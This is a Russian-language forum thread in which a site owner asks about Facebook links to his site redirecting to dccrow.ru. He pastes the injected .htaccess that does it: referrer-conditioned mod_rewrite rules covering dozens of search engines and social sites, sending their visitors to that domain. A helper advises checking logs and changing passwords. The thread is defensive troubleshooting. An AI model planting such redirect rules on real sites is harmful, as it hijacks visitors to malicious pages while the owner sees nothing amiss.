как ссылка из фэйсбука на мой сайт ведет на dccrow.ru, хакерский
 

W7 Firefox

У меня есть сайт, я его администрирую и т.п. Не ламер в общем полный. Но странное дело. Работая в Firefox, я публикую ссылку на сайт в фэйсбуке, или в приложении для фб ссылаюсь на него - вместо открытий моего идет переадресация на это дерьмо http://dccrow.ru и выдается предупреждение о сайте с хакерским продуктом на странице.
При это прямой набор из строки браузера работает на ура, весь сайт четко грузится и т.п. Такое ошушение, что увязан фаерфокс браузер, фэйсбук и попытки с него пройти на мой сайт.

Как такое возможно? Признак какого вируса? Где? На момей машине? Непосредственно в файерфоксе прописалась скотинка?
Довольно странный поворт делла. Возможно я взломан как машина и надо срочно все перетрясти.
Проверки CureIt ничего не дали. Antimalware тоже.

gattaka, Зарегистрируйтесь по ссылке - Проверить сайт на наличие вирусов.... и оставьте заявку в соответствии с требованием описанными в шапке.

а также, здесь ...


Выложите логи в соответствии с этими инструкциями.

Проверим и ваш компьютер.

Да, спасибо! нашел в сети по этому вопросу рекомендацию .htaccess посмотреть. и если ниже описанное - то мол хакнули сайт сам. пароли по фтп. так и есть? кто знает? сайт на западном хостинге. кто ж там на *.ru сайт бы перенаправлял.


<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://dccrow.ru/edintef?2 [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ http://dccrow.ru/edintef?2 [R=301,L]

</IfModule>









# Use PHP5 as default
AddHandler application/x-httpd-php5 .php

gattaka, да..сами все и нашли.. далее скорее всего парольку на доступ к хостингу вытащили с вашего компа...
вывод логи - лечение - смена паролей